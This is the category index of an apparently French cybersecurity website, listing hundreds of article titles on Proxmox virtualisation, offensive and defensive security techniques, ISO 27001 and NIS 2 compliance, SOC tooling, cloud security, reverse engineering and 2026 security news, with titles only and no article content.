Proxmox VE 9 : Hyperviseur Open Source KVM/LXC 2026 Proxmox Backup Manager : Vérifier et Auditer un Datastore Proxmox vs VMware : Comparatif Complet et Guide de Migration Proxmox Backup Server 2026 : 8 Stratégies Avancées Proxmox VE Clustering & Haute Disponibilité — Guide Expert Proxmox GPU Passthrough 2026 : NVIDIA + AMD pour LLM/IA SDN Proxmox VE 9 : Zones, VNets, IPAM et Firewalls Architecture Proxmox VE 9.1 : Cluster 3 Nœuds + HA Réplication Proxmox VE : ZFS, Snapshots et Checklist Administration CLI Proxmox VE : Diagnostic Cluster Déploiement Automatisé Proxmox : Terraform et Ansible Proxmox VE 9.1 : Paramètres Avancés VM et Nested Virt Outils Proxmox VE : Monitoring, IaC et Écosystème 2026 Optimisation Proxmox VE 9 : CPU, RAM, ZFS, Ceph et HA Dimensionnement Proxmox VE 9 : CPU, RAM, Stockage, HA Proxmox VE : Cluster HA, Live Migration et Ceph 2026 Proxmox vs VMware vs Hyper-V : Comparatif Sécurité Durcissement VMware ESXi : Guide Complet de Sécurisation ESXi Hardening : Guide Complet de Sécurisation Avancée Migration VMware vers Proxmox VE : Guide Complet : Guide Hyper-V Shielded VMs : Sécurisation Avancée du : Guide Proxmox Backup Server 2026 : 9 Stratégies Sauvegarde [PBS] Optimisation Proxmox VE 2026 : 25 Tweaks Performance + Évolutions Proxmox : Guide Expert Bonnes Pratiques Calculateur Sizing : Guide Expert Bonnes Pratiques NTP Proxmox : Guide Complet et Bonnes Pratiques pour Experts Dimensionnement Proxmox 2026 : Méthode Pratique CPU/RAM Proxmox VE 9 : Guide 2026 [Installation + Cluster + HA] Migration VMware : Strategies de Detection et de Remediation Sécurité Proxmox VE : Guide Complet Hardening 2026 Hyper-V 2025 : Analyse Technique Approfondie et Securisation

Cybersécurité Générale

99 articles
Éducation, santé, industrie : pourquoi les secteurs hors-tech sont devenus les cibles numéro 1 des ransomwares Patches fantômes : quand corriger une CVE ne corrige rien du tout TeamPCP : vos outils de sécurité deviennent arme attaquant Management planes : le nouveau périmètre que personne RMM Informatique 2026 : Guide Sécurisation MSP Cyber Top 10 Outils RMM 2026 : Comparatif MSP & Sécurité ConnectWise Templates Cybersec MSP 2026 : Hardening Authentification cassée : pourquoi 2026 ressemble à 2010 Exploitation en 4 heures : votre fenêtre de patching est Instructure paie la rançon : un précédent inquiétant Vishing 2026 : pourquoi votre MFA ne vous sauvera plus Audit cyber 2026 : pourquoi je commence par la supply chain SaaS-mageddon : pourquoi vos fournisseurs deviennent votre Patch Tuesday : 28% des CVE exploités en moins de 24h Education : la cible cyber qu'on a laissé tomber (57c) MSP : pourquoi votre prestataire est devenu votre principale Le ransomware sans chiffrement : pourquoi le pire est devant Auth bypass : la faille banale devenue la plus dangereuse KEV de CISA : un catalogue américain qui dicte le patch Votre IDE est devenu une cible. Et personne ne le défend. Divulgation sauvage : quand un chercheur frustré arme Glossaire Cybersécurité : 100 Termes Essentiels 2026 Patch incomplet : la dette technique de la cyberdéfense L'IA est passée du côté des attaquants — et on s'est endormi Cryptographie Post-Quantique : Guide Migration 2026 Pangolin : Reverse Proxy et Tunnel Self-Hosted — Guide Teleport : Zero Trust SSH, Kubernetes et Bases de Données Headscale & Tailscale : WireGuard Mesh VPN — Guide Complet ZTNA 2026 : Comparatif Cloudflare vs Tailscale vs Teleport Cloudflare Zero Trust : Guide Tunnel, Access et Gateway Divulgation publique : les chercheurs qui lâchent l'éditeur Vos endpoints d'observabilité sont vos prochaines backdoors Macros Office en 2026 : votre angle mort favori pour APT28 Quand l'éditeur de sécurité devient le cheval de Troie Triage CVSS isolée : 13 000 firewalls Palo Alto compromis Defender devenu surface d'attaque : 3 zero-days en 48h OT Français : BRIDGE:BREAK Symptôme Vulnérabilité Réseau MCP, l'angle mort 2026 : quand l'admin devient backdoor Extorsion SaaS : vos intégrations tierces, vecteur numéro un Dix heures pour patcher : la fin du cycle de correction MCP : la nouvelle surface d'attaque que personne n'audite Quand vos outils de sécurité deviennent le risque principal PKI d'Entreprise : Architecture, AD CS et Sécurisation Bypass EDR : Techniques d'Évasion et Contre-mesures 2026 Quand un éditeur paralyse 80% des hôpitaux : le risque MCP : la nouvelle surface d'attaque que personne ne veut Quatre zero-days en quatre mois : 2026 redéfinit le patching Appliances réseau : le maillon faible de votre cybersécurité Attaques supply chain en 2026 : l'ennemi est dans le tuyau Ransomware en 24 heures : la fin du luxe de la réponse lente La santé, cible parfaite des cybercriminels en 2026 L'IA agentique : la surface d'attaque que personne ne voit L'ingénierie sociale : l'arme n°1 des États-nations Quand les États font du ransomware : la fin des frontières Quand les États piratent ceux qui nous surveillent Débuter en Pentest : Parcours et Ressources 2026 (51c) Carte des Menaces Cyber 2025-2026 : Threat Landscape 20 Erreurs Fatales en Cybersécurité : AD, Cloud et IA Certifications Cybersécurité 2026 : Guide OSCP à CISSP 15 Mythes en Cybersécurité Démystifiés par un Pentester CrowdStrike vs Defender vs SentinelOne : Quel EDR en 2026 ? L'ingénierie sociale domine : vos firewalls sont obsolètes Quatre zero-days Chrome en 2026 : le navigateur est devenu Zero-days exploités avant le patch : la nouvelle norme en Le délai d'exploitation se réduit à néant : ce que ça Deepfakes et Social Engineering : Menaces IA en 2026 Culture Sécurité en Entreprise : Changer les Comportements Programme Sensibilisation Cyber : Méthode et KPI 2026 Exercices Phishing Interne : Outils et Bonnes Pratiques Défenseurs qui passent à l'attaque : leçons terrain Patch Tuesday ne suffit plus : repenser la gestion Data brokers : les coffres-forts que tout le monde veut Vos outils d automatisation sont devenus des cibles Équipements en fin de vie : maillon faible sécurité quand vos défenseurs travaillent pour l adversaire Pipelines IA en production : vos agents LLM sont des cibles Time-to-exploit : quand les 0-day brûlent en quelques heures OWASP Top 10 : Guide Complet Vulnérabilités Web 2026 Nessus et Greenbone : Guide Scanners Vulnérabilités ANSSI ReCyF : NIS2 en pratique, ce qui change pour vous Pipelines IA : vos clés API sont les nouvelles clés du SI Ransomwares : Pourquoi Vos Sauvegardes Vous Trahissent CI/CD : L'Angle Mort de la Sécurité DevOps en 2026 Vos Outils IA : la Nouvelle Surface d'Attaque Ignorée Ransomware Trends Q1 2026 : Analyse des Groupes en 2026 IOC Management : Automatiser la Threat Intel : Guide Complet Cyber Threat Landscape France 2026 : Bilan ANSSI en 2026 Darkweb Monitoring : Outils et Techniques 2026 en 2026 InfoStealers 2026 : Lumma, Raccoon et RedLine en 2026 Supply Chain APT : Comprendre les Attaques Etatiques Top 10 des Attaques : Attaque, Détection et Défense 2026 Top 10 Outils Sécurité Kubernetes 2025 — Guide Pratique Livre Blanc : Sécurisation | Threat Intelligence 2026 Guide Complet Sécurité Active | Guide Cyberdefense Top 5 Outils Audit AD 2026 [Gratuits + Commerciaux] Top 10 Solutions EDR/XDR 2026 : Comparatif Complet & Tarifs Top 10 Outils d'Audit Sécurité : Guide Complet 2026 Threat Hunting : Detection Proactive avec MITRE en 2026 APT29 2026 : Nouvelles TTP et Campagnes Cloud en 2026

Articles Techniques

111 articles
Kentico Cloud Sécurité 2026 : CVE KEV & Hardening MSP Livres Blancs Pentest & Cybersec 2026 : Collection Anviz Biométrie 2026 : Contrôle d'Accès & Audit Cyber IDOR 2026 : Insecure Direct Object Reference [Guide Complet] Attaques XSS 2026 : Types, Exploitation et Défense [Guide] OSINT : Investigation Numérique et Renseignement Expert Retours d'Expérience Pentest : 5 Missions Anonymisées BloodHound vs SharpHound vs BloodyAD : Guide Comparatif 2026 Burp Suite vs OWASP ZAP : Quel Scanner Web Choisir en 2026 ? Nuclei vs Nessus vs Qualys : Scanners de Vulnérabilités Format String Exploitation Moderne : Du Crash au RCE en 2026 Race Conditions Kernel : Double-Fetch, TOCTOU, LPE BGP Hijacking et OSPF Exploitation : Attaques Routage GPU Side-Channels : Attaques sur CUDA, OpenCL et WebGPU Intel ME et AMD PSP : Exploitation des Coprocesseurs Cryptanalyse Pratique : Attaques sur AES, RSA et ECC SGX, TDX et TEE : Attaques sur les Enclaves Sécurisées 2026 Hypervisor Escape : Techniques d'Évasion VMware, KVM et QEMU Linux Kernel Exploitation : Escalade de Privilèges Side-Channel Attacks : Spectre, Meltdown et Rowhammer ROP/JOP Chains : Exploitation Moderne des Binaires Protégés Heap Exploitation : Use-After-Free et Tcache Poisoning SGX, TDX et TEE : Attaques sur les Enclaves Sécurisées Hack The Box : Méthodologie pour Progresser en 2026 DVWA vs Juice Shop vs WebGoat : Comparatif Labs Web Lab Pentest Proxmox : Guide Complet d'Installation 2026 Top 5 Plateformes CTF et Entraînement Cyber en 2026 Architecture de Sécurité Matérielle Windows 11 & Server 2025 Windows Scheduler Internals : Architecture, Performance Architecture Windows Server 2025 : Noyau NT Expert Architecture Vertical Slice + Clean Lite : Guide 2026 Cryptographie Post-Quantique : Migration Pratique en 2026 Zero Trust Network : Implementation Pratique 2026 en 2026 C2 Frameworks Modernes : Mythic, Havoc, Sliver et Détection DNS Attacks : Tunneling, Hijacking et Cache Poisoning Exploitation de l'Infrastructure as Code Terraform Exploitation des Protocoles Email : SMTP Smuggling et Att... GCP Offensive Security : Exploitation des Services Google Purple Team : Méthodologie et Exercices Collaboratifs Race Conditions et TOCTOU : Exploitation Bugs Timing Windows Kernel Exploitation : Drivers, Tokens et KASLR Threat Intelligence : Automatiser la Veille Cyber en 2026 Attaques sur les Identity Providers Okta, Entra et Keycloak Attaques sur les Pipelines ML/AI et Empoisonnement de Mod... SSRF Avance : Bypass des Protections Cloud 2026 en 2026 Windows Kernel : Exploitation de Drivers Vulnerables Agents IA pour la Cyber-Défense et le Threat Hunting Cyber-Défense Agentique contre les APTs : Guide Complet Red Teaming des Agents Autonomes : Méthodologie LLM Shadow Hacking et Outils IA Non-Autorisés en Entreprise Container Escape : Techniques d'Évasion Docker et 2026 AD CS Exploitation 2026 : ESC1 à ESC16 [Guide Complet] Hardware Hacking : JTAG, SWD, UART et Extraction de Firmware Post-Exploitation : Pillage, Pivoting et Persistance Sécurité Mobile Offensive : Android et iOS en 2026 Service Mesh Exploitation : Istio, Linkerd et Envoy SIM Swapping et Attaques Telecom : SS7, Diameter et 5G UEFI Bootkits et Attaques sur le Firmware : Persistance A... Attaques sur les Bases de Données SQL, NoSQL et GraphQL Attaques CI/CD Avancées : GitOps, ArgoCD et Flux DevOps Attaques Serverless : Exploitation de Lambda, Azure Attaques sur les Smart Contracts et la Sécurité Web3 Attaques Wireless Avancées : Wi-Fi 7, BLE 5.4 et Zigbee Browser Exploitation Moderne : V8, Blink et les Sandbox Bypass FIDO2 et Passkeys : Attaques sur l'Authentification ICS/SCADA : Pentest d'Environnements Industriels en 2026 Supply Chain : Detecter les Dependances Malveillantes Incident Response : Playbook Ransomware 2026 : Guide Complet Reverse Engineering : Analyse de Firmware IoT en 2026 GraphQL Injection : Techniques d'Exploitation 2026 API Security : Fuzzing Avance avec Burp et Nuclei en 2026 Cloud Forensics : Investigation AWS et Azure : Guide Complet OAuth 2.1 : Nouvelles Protections et Migration en 2026 Pentest Wi-Fi 7 : Nouvelles Surfaces d'Attaque en 2026 C2 Frameworks 2026 : Mythic vs Havoc vs Sliver en 2026 DNS Tunneling Detection : Guide SOC Analyst : Guide Complet Phishing 2026 : Techniques Avancees de Spear-Phishing Web3 Security : Audit de Smart Contracts Solidity en 2026 Attaques sur CI/CD : Sécuriser GitHub et Pipelines Azure AD : Attaques et Défenses — Guide Expert 2026 Supply-chain applicative (typosquatting, dependency Secrets Sprawl : Collecte et Prévention — Guide Expert 2026 SSRF moderne (IMDSv2, gopher/file, : Guide Complet NTLM Relay Moderne : SMB, HTTP, LDAP [Attaque + Defense] Evasion d’EDR/XDR : techniques : Guide Expert 2026 Phishing sans Pièce Jointe : Guide Expert Cybersécurité Persistence sur macOS : Analyse et Technique Expert WebCache Deception & Poisoning : Guide Expert 2026 Abus OAuth/OIDC : Consent Abuse — Guide Cybersécurité 2026 Sécurité des LLM : Risques et Mitigations Guide 2026 Chaîne d'exploitation Kerberos en : Analyse Technique Living-off-the-Land (LOL-Bins) : Analyse Attaques (52c) Exfiltration furtive (DNS, DoH, : Analyse Technique Kubernetes offensif (RBAC abuse, : Analyse Technique Désérialisation 2026 : Gadgets PHP, Java, .NET, Python Attaques sur API GraphQL : Attaque, Détection et Défense Escalades de Privilèges AWS : Guide Expert Complet 2026 OT/ICS : passerelles, protocoles : Guide Expert 2026 Cloud IAM : Escalade de Privileges Multi-Cloud en 2026 AWS Lambda Security : Attaques et Defenses : Guide Complet Terraform Security : Audit et Durcissement IaC en 2026 SIEM : Correlations Avancees pour Threat Hunting en 2026 Mobile Pentest : Bypass SSL Pinning Android 15 en 2026 Container Escape 2026 : Nouvelles Techniques Docker Bug Bounty 2026 : Strategies et Plateformes : Guide Complet Bypass EDR 2026 : Techniques de Contournement et Défenses ZED de PRIM'X : Conteneurs Chiffrés et Sécurité Données Malware Analysis : Sandbox Evasion Techniques en 2026 Purple Team : Exercices Pratiques AD et Cloud en 2026 OSINT 2026 : Outils et Techniques de Reconnaissance Kubernetes RBAC : 10 Erreurs de Configuration Critiques

Conformité

129 articles
Financement AirCyber PME : Subventions et Aides 2026 Choisir son Assesseur AirCyber Accrédité : Guide Complet AirCyber Bronze Safran : Guide Complet Fournisseurs Modèles PSSI et Politiques de Sécurité pour AirCyber Bronze Documents Audit AirCyber Bronze : Liste et Conseils AirCyber et NIS 2 : Conformité Supply Chain Aérospatiale Checklist 44 Mesures ANSSI : AirCyber Bronze Complet AirCyber Silver : Exigences et Chemin depuis Bronze AirCyber vs ISO 27001 : Différences et Complémentarité Guide AirCyber Bronze : Obtenir la Labellisation en 2026 MLOps conforme ISO 27001 et NIS 2 — pipeline IA sécurisé AIPD 2026 : Analyse d'Impact CNIL & RGPD [Template] Homologation ANSSI 2026 : Référentiel OIV / OSE NIS2 Audit Cybersécurité PME 2026 : 15 Contrôles ANSSI Clés Audit Sécurité Informatique 2026 : Guide PME/ETI Cyber Charte Informatique 2026 : 3 Modèles Word Gratuits + Guide Auto-Diagnostic d'Applicabilité NIS 2 : Template Excel 2026 Procédure Notification Incidents ANSSI : 24h / 72h NIS 2 [Word] Politique Gouvernance NIS 2 : Responsabilité Dirigeants Art. 32 [Word] Cartographie Sous-Traitants Critiques NIS 2 : Excel [Art. 21.2.d] Mapping ReCyF ANSSI vs 10 Mesures Art. 21 NIS 2 : Excel Checklist 10 Mesures Article 21 NIS 2 : Auto-Évaluation [PDF] Tableau de Bord Conformité NIS 2 : 20 KPI Excel + Graphiques Plan de Mise en Conformité NIS 2 sur 12 Mois : Excel Guide Inscription MonEspaceNIS2 : Pas à Pas Portail ANSSI [PDF] Plan de Formation Dirigeants NIS 2 : COMEX/CODIR [Word] Document de Périmètre SMSI ISO 27001 : Modèle Word [Clause 4.3] Analyse de Contexte Organisation ISO 27001 : Modèle Word [4.1/4.2] Registre Exigences Légales & Contractuelles ISO 27001 : Excel [A.5.31] Matrice de Compétences SMSI ISO 27001 : Excel [Clause 7.2] Plan de Communication SMSI ISO 27001 : Modèle Word [Clause 7.4] Plan de Traitement des Risques (RTP) ISO 27001 : Excel [6.1.3] Matrice RACI Rôles SMSI ISO 27001 : Excel [Clause 5.3] Revue de Direction ISO 27001 : Agenda + PV type [Word, Clause 9.3] Politique de Sauvegarde ISO 27001 : Modèle Word [A.8.13] Politique Anti-Malware & EDR ISO 27001 : Word [A.8.7] Politique Logging & Monitoring ISO 27001 : Word [A.8.15-16] Politique Sécurité Réseau ISO 27001 : Word [A.8.20-22] Politique Transfert d'Information ISO 27001 : Word [A.5.14] Politique Sécurité Physique & Environnementale ISO 27001 : Word [A.7] Politique Services Cloud ISO 27001 : Word [A.5.23] Politique DLP (Data Leakage Prevention) ISO 27001 : Word [A.8.12] Procédure Onboarding / Offboarding Utilisateur ISO 27001 : Word Procédure RCA Root Cause Analysis ISO 27001 : Template Word Procédure Data Masking & Anonymisation ISO 27001 : Word [A.8.11] Procédure Gestion Documentaire SMSI ISO 27001 : Word [Clause 7.5] Registre des Risques ISO 27001 : Template Excel Gratuit [2026] Inventaire des Actifs ISO 27001 : Template Excel [Annexe A 5.9] Registre des Incidents ISO 27001 : Template Excel [A.5.24] Registre des Non-Conformités ISO 27001 : Template Excel [Clause 10] Registre des Sous-Traitants ISO 27001 : Template Excel [A.5.19-23] Gap Analysis ISO 27001:2022 : Outil Excel Automatisé [93 Contrôles] Plan d'Audit Interne ISO 27001 : Template Excel Annuel BIA Business Impact Analysis ISO 22301/27001 : Template Excel Tableau de Bord KPI ISMS ISO 27004 : Excel [25 Indicateurs] Charte Utilisateur SI : Modèle Word Gratuit [ISO 27001] Politique Gestion des Accès Logiques : Modèle Word [A.5.15-18] Politique de Classification de l'Information : Word [A.5.12] Politique Mots de Passe ISO 27001 : Modèle Word [NIST + ANSSI] Politique Télétravail & BYOD : Modèle Word [A.6.7, A.8.1] Politique Cryptographie ISO 27001 : Modèle Word [A.8.24 + ANSSI] Procédure Gestion des Incidents ISO 27001 : Modèle Word [A.5.24-28] Procédure Gestion des Changements ISO 27001 : Word [A.8.32] Rapport d'Audit Interne ISO 27001 : Modèle Word Préformaté Plan de Continuité d'Activité (PCA) : Modèle Word [ISO 22301/27001] Checklist Audit Certification ISO 27001 : Stage 1 + Stage 2 [PDF] Risques Cyber Pré et Post Acquisition (M&A) : Guide DD Modèle PSSI : Politique de Sécurité SI Gratuite (ISO 27001) Fiche Mémo Transition ISO 27001:2022 (PDF Recto-Verso) Template SoA : Déclaration d'Applicabilité ISO 27001 (PDF) Kit Audit Interne ISO 27001 : 50 Questions Essentielles (PDF) Checklist ISO 27001:2022 — 93 Contrôles Annexe A (PDF Gratuit) Auto-évaluation Maturité SSI — Grille de Scoring (PDF Gratuit) RGPD et AI Act : Guide de Double Conformité en 2026 ISO 42001 : Guide du Système de Management de l'IA SOA ISO 27001 : Statement of Applicability Complet Feuille de Route ISO 27001 : Certification en 12 Étapes Checklist Audit ISO 27001 : 93 Contrôles Annexe A 2022 Charte Informatique Entreprise : Guide et Modèle Word Analyse de Risques ISO 27005 : Méthodologie Complète PSSI ISO 27001 : Guide Rédaction et Modèle Complet Aspects Juridiques et Éthiques de l’IA : Cadre Réglementaire Classification des données : méthodes et outils pratiques Analyse d'impact AIPD : méthodologie CNIL pas à pas NIS 2 et DORA : double conformité du secteur financier Maturité cybersécurité : modèles CMMC et NIST CSF 2.0 Cartographie des risques cyber avec EBIOS RM en 2026 SMSI ISO 27001 version 2022 : guide complet pas à pas Audit de conformité RGPD : checklist complète pour DPO NIS2, DORA et RGPD : Cartographie des Exigences Croisées IEC 62443 : Cybersécurité Industrielle OT - Guide : Guide Audit de Sécurité du SI : Méthodologie et Outils 2026 PRA/PCA Cyber : Plan de Reprise et Continuité d'Activité Qualification PASSI ANSSI : Devenir Prestataire d'Audit Audit de Sécurité Cloud : Checklist Conformite 2026 PCI DSS 4.0.1 : Nouvelles Exigences Mars 2026 en 2026 Conformite Multi-Referentiels : Approche Unifiee 2026 NIS 2 Phase Operationnelle : Bilan 6 Mois Apres en 2026 Aspects Juridiques et Ethiques de l'IA en Entreprise ISO/IEC 42001 Foundation : Système de Management IA ISO 42001 Lead Auditor : Auditer un Systeme de Management ISO 42001 Lead Implementer : Systèmes de Management IA RGPD et AI Act : Guide Complet pour les Organisations en ... Développement Sécurisé ISO 27001 : Cycle S-SDLC en 6 Cyber Assurance 2026 : Exigences et Marche Durci en 2026 SOC 2 Type II : Retour d'Experience Implementation DORA 2026 : Impact sur le Secteur Financier Francais Cyber-assurance 2026 : Nouvelles Exigences et Guide Complet AI Act 2026 : Guide Conformité Systèmes IA à Haut Risque Cyber Resilience Act 2026 : Guide Anticipation Produits C... DORA 2026 : Premier Bilan et Contrôles ACPR - Guide Complet NIS 2 Phase Opérationnelle 2026 : Guide Complet de Mise RGPD 2026 : Sécurité des Donnees et Enforcement CNIL - Gu... Certification HDS 2026 : Hébergeur de Données de Santé PCI DSS 4.0.1 en 2026 : Retour d'Expérience et Guide SBOM 2026 : Obligation de Sécurité et Guide Complet SecNumCloud 2026 et EUCS : Guide Complet Qualification Cryptographie Post-Quantique : Guide Complet pour les SI ... ISO 27001:2022 Guide Complet Certification Expert 2026 NIS 2 : Guide de la Directive Européenne Cybersécurité SOC 2 : Guide Complet Conformite pour Organisations RGPD 2026 : Durcissement des Sanctions par la CNIL HDS 2026 : Certification Hebergement de Donnees Sante Cyber Resilience Act : Guide de Conformite Produits RGPD et IA Generative : Guide de Conformite CNIL en 2026 SecNumCloud 2026 : Migration et Certification EUCS AI Act Classification : Systemes a Haut Risque en 2026 SBOM 2026 : Obligation de Transparence Logicielle en 2026 ISO 27001:2022 vs ISO 27001:2013 : Differences Cles

SOC et Detection

35 articles
Suricata : IDS/IPS/NSM Open Source Multi-thread 2026 Graylog : Plateforme SIEM Log Management Open Core SentinelOne Singularity : XDR Autonome Powered by AI Audit DNS 2026 : Sécuriser SOA, SPF, DMARC, DNSSEC, DANE Microsoft Defender : Suite XDR Microsoft 365 en 2026 Splunk : Plateforme SIEM Observability (Cisco) 2026 Microsoft Sentinel : SIEM/SOAR Cloud Microsoft Azure 2026 CrowdStrike Falcon : EDR/XDR cloud-native, modules et prix Wazuh : Plateforme XDR/SIEM Open Source 2026 - Guide Complet Wazuh SIEM/XDR : Guide Déploiement et Détection 2026 Incident Triage : Classification et Priorisation SOC 2026 Threat Hunting Proactif : Techniques et Outils SOC 2026 Sigma Rules : Standard de Détection Universel Guide Complet SOC as a Service : Externaliser la Détection Guide 2026 XDR vs SIEM vs EDR : Comprendre les Différences en 2026 Purple Team : Collaboration entre SOC et Red Team Guide Détection du Mouvement Latéral : Guide Complet SOC 2026 Triage des Alertes SOC : Méthodologie Complète pour Analyste NDR : Détection Réseau et Réponse aux Menaces Guide 2026 SIEM Cloud-Native vs On-Premise : Comparatif Complet 2026 Log Management : Architecture et Rétention SOC : Guide Use Cases SIEM : 50 Règles Détection Essentielles : Gui SOC Metrics et KPIs : Mesurer la Performance : Guide Co SOAR : Automatisation Réponse Incident Guide : Guide Co Threat Intelligence Platforms : Comparatif 2026 : Guide Microsoft Sentinel : Déploiement et Règles KQL : Guide Splunk Enterprise Security : Configuration SOC : Guide Elastic SIEM : Stack Détection Open Source 2026 : Guide SOC Moderne : Architecture et Outils Guide 2026 : Guide Analyste SOC : Niveaux, Parcours et Compétences : Guide Threat Hunting : Méthodologie, Outils et Cas Pratiques Detection Engineering : Construire des Règles de : Guide Detection-as-Code : CI/CD pour Règles SIEM et SIGMA Sigma Rules : Guide d'Écriture et Déploiement SIEM Wazuh 2026 : SIEM/XDR Open Source — Guide Déploiement

Cloud Security

53 articles
Cloudflare : CDN, WAF, Zero Trust, Edge Compute 2026 Docker : Plateforme de Conteneurisation et Sécurité 2026 Kubernetes (K8s) : Orchestrateur Conteneurs CNCF en 2026 Falco : Detection Runtime Cloud-Native (CNCF) 2026 Audit Sécurité Pipeline CI/CD : SAST, DAST, SCA Intégrés Cloud IAM : AWS IAM vs Azure RBAC vs GCP IAM — Comparatif Kubernetes RBAC : Guide Sécurisation des Permissions Conditional Access Azure : Guide Complet Entra ID 2026 Cloud Forensics Avancée Post-Compromission sur AWS Pentest Cloud 2026 : Méthodologie AWS, Azure, GCP [Guide] Cloud Logging : Guide Centralisation et Monitoring Sécurité Cloud Network Security : Guide Complet VPC, WAF et DDoS DevSecOps Cloud : Guide Pipeline CI/CD Sécurisé Complet Cloud Disaster Recovery : Guide PRA et Résilience Cloud Cloud Compliance : Guide RGPD, HDS et SecNumCloud 2026 Cloud Forensics : Guide Investigation Incident Cloud 2026 Infrastructure as Code Security : Guide Terraform Complet Cloud Encryption : Guide Chiffrement Données et Clés KMS CASB : Guide Comparatif Cloud Access Security Broker 2026 Container Security : Docker et Runtime Protection Avancée Serverless Security : Sécuriser Lambda et Functions Cloud Multi-Cloud Security : Guide Stratégie Sécurité Unifiée Cloud IAM : Guide Gestion Identités et Accès Cloud 2026 Kubernetes Security : Guide Durcissement Cluster K8s 2026 Sécurité AWS : Guide Complet Hardening Compte et Services Azure Security Center : Guide Configuration Complète 2026 GCP Security : Bonnes Pratiques et Guide Audit Cloud 2026 CSPM : Guide Cloud Security Posture Management Complet CNAPP : Guide Protection Cloud-Native Applications 2026 ZTNA Zero Trust Network Access Cloud : Guide Complet Disaster Recovery Cloud : PRA Multi-Région en 2026 Attaques sur Metadata Services Cloud : SSRF et IMDS FinOps Sécurité : Cryptomining Ressources Fantômes Secrets Management Cloud : Vault et Key Vault 2026 Cloud Compliance NIS 2 SecNumCloud ISO 27017 Guide Sécurité Multi-Cloud : Stratégie Unifiée AWS, Azure et GCP Cloud Misconfiguration : Top Erreurs de Sécurité AWS Cloud IAM : Sécurisation des Identités et Accès AWS, CSPM : Cloud Security Posture Management - Guide Complet Souveraineté Cloud : Protéger les Données Sensibles Container Registry : Guide Sécurité Images Docker 2026 Cloud Logging Monitoring : Visibilité Complète 2026 Service Mesh Security : Sécuriser Istio et Linkerd Cloud Pentest Azure : Exploitation Misconfiguration Terraform IaC Sécurisé : Checklist de Durcissement Cloud Pentest AWS avec Pacu et CloudFox : Le Guide Sécurité Serverless : Lambda Functions et Protection CNAPP Cloud-Native Application Protection Platform Kubernetes Security : RBAC et Network Policies 2026 GCP Security Command Center : Audit et Durcissement Azure Defender for Cloud : Guide Configuration 2026 AWS Security : Les 20 Services Sécurité Essentiels Sécuriser une Architecture Multi-Cloud AWS et Azure

Retro-Ingenierie

18 articles
Frida et DynamoRIO : Instrumentation Binaire Avancée 2026 Symbolic Execution : Angr, Triton et Découverte d'Exploits Analyse Mémoire Forensique : Volatility pour Malware Analyse de Shellcode : Techniques de Rétro-Ingénierie Rétro-Ingénierie de C2 : Cobalt Strike et Brute Ratel Anti-Analyse Malware : Techniques et Contournements Analyse de Stealers : RedLine, Raccoon, Lumma 2026 Unpacking Malware Avancé : Techniques et Outils 2026 Rétro-Ingénierie de Ransomware : Analyse Technique Analyse Dynamique de Malware Avancée : Sandbox Expert Anti-Rétro-Ingénierie APT - Techniques d'Évasion Avancées Disséquer l'Obscurité : Techniques Avancées de Déobfuscation IA Frameworks pour l'Analyse de Malwares - Deep Learning Malwares Mobiles & IA - Rétro-Ingénierie Cross-Platform Chasse aux Fantômes : Rétro-Ingénierie Ghidra : Guide de Reverse Engineering pour Débutants Fileless Malware : Analyse, Détection et Investigation Reverse Engineering .NET : Décompilation et Analyse

News

579 articles
Google Gemini 3.5 Flash GA : frontier-level à 4x la vitesse DevOps 2026 : 29 M secrets hardcodés et OSS sous pression West Pharmaceutical : vol de données et usines à l'arrêt Drupal patche une faille critique sans auth en urgence OpenAI rejoint C2PA et watermarque ses images avec SynthID OpenAI et Dell deployent Codex en entreprise sur site Canvas : ShinyHunters vole 3,65 To et 275 millions d'identités éducatives CVE-2026-31431 « Copy Fail » : root sur tout Linux depuis 2017 en 732 octets TeamPCP : 170 packages npm et PyPI piégés pour vider vos pipelines CI/CD Google I/O 2026 : toutes les annonces Gemini et Android Microsoft MDASH : l IA agentique trouve 16 failles Windows SEPPMail : 7 CVE critiques menacent les passerelles email 7-Eleven : ShinyHunters subtilise 600 000 records Salesforce Nx Console VS Code : attaque supply chain vise 2,2 M devs NGINX Rift CVE-2026-42945 : la faille de 18 ans exploitée MuddyWater : Teams et faux ransomware Chaos pour masquer l'espionnage iranien Windows MiniPlasma : LPE zero-day avec PoC public, SYSTEM sur toutes versions CVE-2026-42897 : zero-day Exchange Server exploité, aucun patch disponible SharePoint CVE-2026-32201 : RCE sans auth, 1 300 serveurs Medtronic : ShinyHunters derobe 9 millions de dossiers Anthropic depasse 30 Md$ de revenu grace a Claude Code Pwn2Own Berlin 2026 : 47 zero-days et 1,3 M$ en 3 jours SAP Sapphire 2026 : 200 agents IA pour piloter l'ERP autonome Google I/O 2026 : Gemini 4, Android 17 et XR annoncés demain CVE-2026-20182 : Cisco SD-WAN — bypass auth CVSS 10.0, CISA Instructure : 275M étudiants compromis par ShinyHunters CVE-2026-41940 : Compromission cPanel, 44K Serveurs Affectés Grafana : vol du code source via GitHub Actions et extorsion UK CMA ouvre enquête antitrust Microsoft Windows (51c) FunnelKit WordPress : vol CB actif sur 40 000 boutiques Google GTIG stoppe le premier zero-day 2FA bâti par IA Google fait d'Android un "intelligence system" Gemini Cushman & Wakefield : 50 Go Salesforce volés par vishing SAP Commerce Cloud CVE-2026-34263 : RCE sans auth (CVSS 9.6) WordPress CVE-2026-4882 : Faille RCE User Registration Microsoft : 35 000 utilisateurs piégés par AiTM Code of Claw Chain : 4 CVE chaînées exposent 245 000 agents IA Turla mute Kazuar en botnet P2P modulaire pour persister Exchange CVE-2026-42897 : zero-day OWA exploité, patch en cPanel CVE-2026-41940 : 1,5 million de serveurs exposés Cisco Catalyst SD-WAN : zero-day CVSS 10 via UAT-8616 Foxconn piégé par Nitrogen : 11M fichiers exfiltrés Meta supprime 8 000 postes pour Superintelligence Labs node-ipc piégé : un stealer exfiltre par DNS sur npm depuis FamousSparrow niche dans le pétrole-gaz d'Azerbaïdjan via Anthropic vise 950 Md$ et talonne OpenAI sur le marché MuddyWater : faux Chaos ransomware pour espionner via Teams NGINX Rift CVE-2026-42945 : RCE non-auth en 18 ans CVE-2026-42898: Dynamics 365 vulnérable (CVSS 9.9) PraisonAI CVE-2026-44338 : exploité 3h44 après disclosure CVE-2026-20182 : Cisco Catalyst SD-WAN tombe sous UAT-8616 OpenAI ouvre GPT-5.5-Cyber à l'UE, Anthropic retient Mythos Fog ransomware : vague d'attaques via VPN compromis Instructure paye ShinyHunters : 3,65 To et 275M de profils Google et SpaceX projettent des data centers IA en orbite TrickMo C : banker Android mode TON frappe la France CVE-2026-40361 : zero-click Outlook ressuscite BadWinmail Dead.Letter 